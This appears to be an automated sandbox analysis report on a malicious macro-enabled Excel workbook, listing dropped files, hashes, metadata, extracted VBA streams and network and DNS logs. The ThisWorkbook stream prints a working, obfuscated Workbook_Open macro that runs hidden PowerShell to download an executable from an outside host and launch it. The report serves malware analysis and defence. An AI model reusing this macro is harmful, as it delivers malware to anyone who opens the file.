                                                                                              Preview:1
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):16384
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                              SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                              SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                              SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmp667.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):81
                                                                                              Entropy (8bit):4.756456874631155
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:FER/n0eFHHoXp4EaKC51Hn:FER/lFHIPaZ5t
                                                                                              MD5:DFEF3C321A0EBAB536D6E3215B1DFC8B
                                                                                              SHA1:97E8201D0952F8980C30E7BB26A6AADFED16DD8F
                                                                                              SHA-256:5143DF7EB4C435AE42D52AA0B2A295F79285D28240DFEED796CB12D68BA4A347
                                                                                              SHA-512:006A719162E465A00FB08E1F2CE19667B9A53CA91585A39CAC675EECF4037ADEB44C3285CDA7610A292C591AA1BFF7EE4F6790BB8F769BDC64F9C27F2A0D61F1
                                                                                              Malicious:true
                                                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\svcost.exe"""
                                                                                              Process:C:\Users\user\AppData\Local\Temp\tmp667.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):262244634
                                                                                              Entropy (8bit):7.999990077927695
                                                                                              Encrypted:true
                                                                                              SSDEEP:6291456:aLL+czx+knHWnHnVeJJs5q5IEXNwNBHaH3Os:ghdnHEoUE8a+s
                                                                                              MD5:E3902A9C7AC3C2180B535F81DA7CD147
                                                                                              SHA1:D5D481B30B9580C404673FDAC260368C59DEDFC0
                                                                                              SHA-256:677CA9B5195BB7D3B063BCE9753A1EBE89EFC59FE143655E149293E38437130A
                                                                                              SHA-512:A36276CB43CCD5B5294D2A786F9FAE1931AF3E106BBD56537E43D0C1F89835BA88E55E2F7F352B4829B1A64CC582EE0E4257D96E807A3897A695F9A8067A2DB4
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):449245
                                                                                              Entropy (8bit):7.993947297363596
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:w+l3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25w:D5PBexJJF2cSwG4ofTn5w
                                                                                              MD5:285077F2B25F1501E13036863D0E1A2C
                                                                                              SHA1:102EF83C2C014C988122D76B938703311DEB631C
                                                                                              SHA-256:DD95063599D0CB5CE211D3495AF5AFEF1C6022BA8B34590F8515CE2E7B48CEAC
                                                                                              SHA-512:4F343AD7046CBC89FDBA6A46FEDD1A21F23F4634386B42DEF70C7AAB0F0CCBB90BBB9C7857D136B009957B22FE55FA904E69064DA24C1405C02E886343C685B4
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Category:dropped
                                                                                              Size (bytes):449245
                                                                                              Entropy (8bit):7.993947297363596
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:w+l3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25w:D5PBexJJF2cSwG4ofTn5w
                                                                                              MD5:285077F2B25F1501E13036863D0E1A2C
                                                                                              SHA1:102EF83C2C014C988122D76B938703311DEB631C
                                                                                              SHA-256:DD95063599D0CB5CE211D3495AF5AFEF1C6022BA8B34590F8515CE2E7B48CEAC
                                                                                              SHA-512:4F343AD7046CBC89FDBA6A46FEDD1A21F23F4634386B42DEF70C7AAB0F0CCBB90BBB9C7857D136B009957B22FE55FA904E69064DA24C1405C02E886343C685B4
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                              Malicious:false
                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):165
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                              Malicious:true
                                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              File type:Microsoft Excel 2007+
                                                                                              Entropy (8bit):7.993912897429242
                                                                                              TrID:
                                                                                              • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                                                                                              • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                                                                                              • ZIP compressed archive (8000/1) 8.38%
                                                                                              File name:DGTCkacbSz.xlsx
                                                                                              File size:445'545 bytes
                                                                                              MD5:adfcfa59a06bbc5a0faa8f5b0ff663fe
                                                                                              SHA1:01d4b8e70b641863727d671e9b087633f3b3a37e
                                                                                              SHA256:88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39
                                                                                              SHA512:0749086410e6ebaab4a23a2eb46e0bddafa134c8a704ec6b1b860a6d9016d6a6b877c2cff6be5eb5161c214fbdf731ad002fec0ab155d1e4557ee30c5a1bf836
                                                                                              SSDEEP:12288:el3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25EN:e5PBexJJF2cSwG4ofTn5Y
                                                                                              TLSH:7E942302D3293DCFF853537B5DD09B8480E03CD2690B245E3A1AA869659B4FF945FBAC
                                                                                              File Content Preview:PK..........!.-...............[Content_Types].xml ...(.........................................................................................................................................................................................................
                                                                                              Icon Hash:2562ab89a7b7bfbf
                                                                                              Document Type:OpenXML
                                                                                              Number of OLE Files:1
                                                                                              Has Summary Info:
                                                                                              Application Name:
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:False
                                                                                              Contains Workbook/Book Stream:True
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:False
                                                                                              Flash Objects Count:0
                                                                                              Contains VBA Macros:True
                                                                                              Author:Dell
                                                                                              Last Saved By:Dell2
                                                                                              Create Time:2021-08-19T14:03:52Z
                                                                                              Last Saved Time:2024-11-21T09:49:20Z
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:0
                                                                                              Thumbnail Scaling Desired:false
                                                                                              Company:
                                                                                              Contains Dirty Links:false
                                                                                              Shared Document:false
                                                                                              Changed Hyperlinks:false
                                                                                              Application Version:16.0300
                                                                                              General
                                                                                              Stream Path:VBA/Sheet1
                                                                                              VBA File Name:Sheet1.cls
                                                                                              Stream Size:169
                                                                                              Attribute VB_Name = "Sheet1"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = False
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:VBA/ThisWorkbook
                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                              Stream Size:699
                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = False
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              Private Sub Workbook_Open()
                                                                                              Dim Lxhraxtl As String, sOutput As String
                                                                                              Dim Hthql As Object, HthqlExec As Object
                                                                                              Lxhraxtl = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
                                                                                              Lxhraxtl = Replace(Lxhraxtl, "*", "")
                                                                                              Lxhraxtl = Replace(Lxhraxtl, "^", "")
                                                                                              Set Hthql = CreateObject("WScript.Shell")
                                                                                              Set HthqlExec = Hthql.Exec(Lxhraxtl)
                                                                                              End Sub

                                                                                              General
                                                                                              Stream Path:PROJECT
                                                                                              CLSID:
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:474
                                                                                              Entropy:5.166315308180005
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 1 7 3 D D 1 B E 1 1 B E 1 1 F E 5 1 F E 5 " . . D P B = " D 7 D 5 7 B 5 6 8 5 F A 4 1 1 7 4 1 1 7 B E E 9 4 2 1 7 2 6 8 A 9 1 0 4 2 8 F F 5 8 C E A
                                                                                              General
                                                                                              Stream Path:PROJECTwm
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:62
                                                                                              Entropy:3.0554671543224337
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                                                              General
                                                                                              Stream Path:VBA/_VBA_PROJECT
                                                                                              CLSID:
                                                                                              File Type:ISO-8859 text, with no line terminators
                                                                                              Stream Size:7
                                                                                              Entropy:1.8423709931771088
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:a . . .
                                                                                              Data Raw:cc 61 ff ff 00 00 00
                                                                                              General
                                                                                              Stream Path:VBA/dir
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:209
                                                                                              Entropy:5.683388262349176
                                                                                              Base64 Encoded:False
                                                                                              Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                              Nov 25, 2024 14:58:09.589274883 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.589342117 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.594918966 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.594930887 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.594997883 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.605616093 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.605695963 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.616300106 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.616370916 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.617189884 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.627099991 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.627167940 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.632729053 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.632783890 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.645391941 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.712830067 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.712961912 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.722826958 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.722909927 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.727421045 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.727493048 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.736583948 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.736658096 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.745115995 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.745225906 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.753729105 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.753814936 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.758150101 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.758218050 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.766119957 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.766191006 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.770293951 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.770358086 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.777621031 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.777694941 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.785062075 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.785140038 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.792558908 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.792654991 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.796473980 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.796533108 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.804003954 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.804071903 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.842175007 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.842195988 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.842271090 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.845947981 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.845957994 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.845971107 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.846028090 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.846035004 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.846048117 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.846079111 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.847460985 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.847507954 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.854979992 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.855031967 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.862251043 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.862318039 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.866152048 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.866214037 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.929125071 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.929219007 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.934823036 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.934878111 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.937874079 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.937935114 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.943541050 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.943591118 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.949304104 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.949372053 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:09.963843107 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:09.963912964 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.175347090 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.175503016 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.233722925 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.233763933 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.233828068 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348701954 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348721027 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348737001 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348788023 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348794937 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348810911 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348815918 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348826885 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348840952 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348846912 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.348862886 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348881006 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.348913908 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.455487967 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.455502033 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.455570936 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.462538004 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.462546110 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.462563038 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.462631941 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.462666988 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.590671062 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.590679884 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.590707064 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.590795994 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.663980007 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.664001942 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.664026022 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.664117098 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.664140940 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.856764078 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.856775999 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.856807947 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.856827974 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.856909990 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.856909990 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.918056011 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.918066025 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.918101072 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.918210983 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.918210983 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.987962961 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.987971067 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.987983942 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:10.988045931 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:10.988090992 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.043010950 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.043015957 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.043032885 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.043049097 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.043179989 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.043179989 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.203341961 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.203355074 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.203370094 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.203432083 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.203500032 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252011061 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252031088 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.252044916 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.252063036 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.252111912 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252156019 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.252187014 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.377979040 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.377995968 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.378016949 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.378083944 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.378118992 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.453567028 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.453577995 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.453588963 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.453610897 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.453768969 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.453768969 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.486496925 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.486507893 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.486524105 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.486743927 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.514077902 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.514090061 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.514101982 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.514112949 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.514301062 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.514301062 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.555260897 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.555268049 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.555310011 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.555470943 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.579334021 CET49161443192.168.2.22172.67.129.178
                                                                                              Nov 25, 2024 14:58:11.579339981 CET44349161172.67.129.178192.168.2.22
                                                                                              Nov 25, 2024 14:58:11.579355001 CET44349161172.67.129.178192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 14:58:06.602324963 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Nov 25, 2024 14:58:06.865701914 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 14:58:06.602324963 CET | 192.168.2.22 | 8.8.8.8 | 0x410a | Standard query (0) | cia.tf | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 14:58:06.865701914 CET | 8.8.8.8 | 192.168.2.22 | 0x410a | No error (0) | cia.tf | | 172.67.129.178 | A (IP address) | IN (0x0001) | false
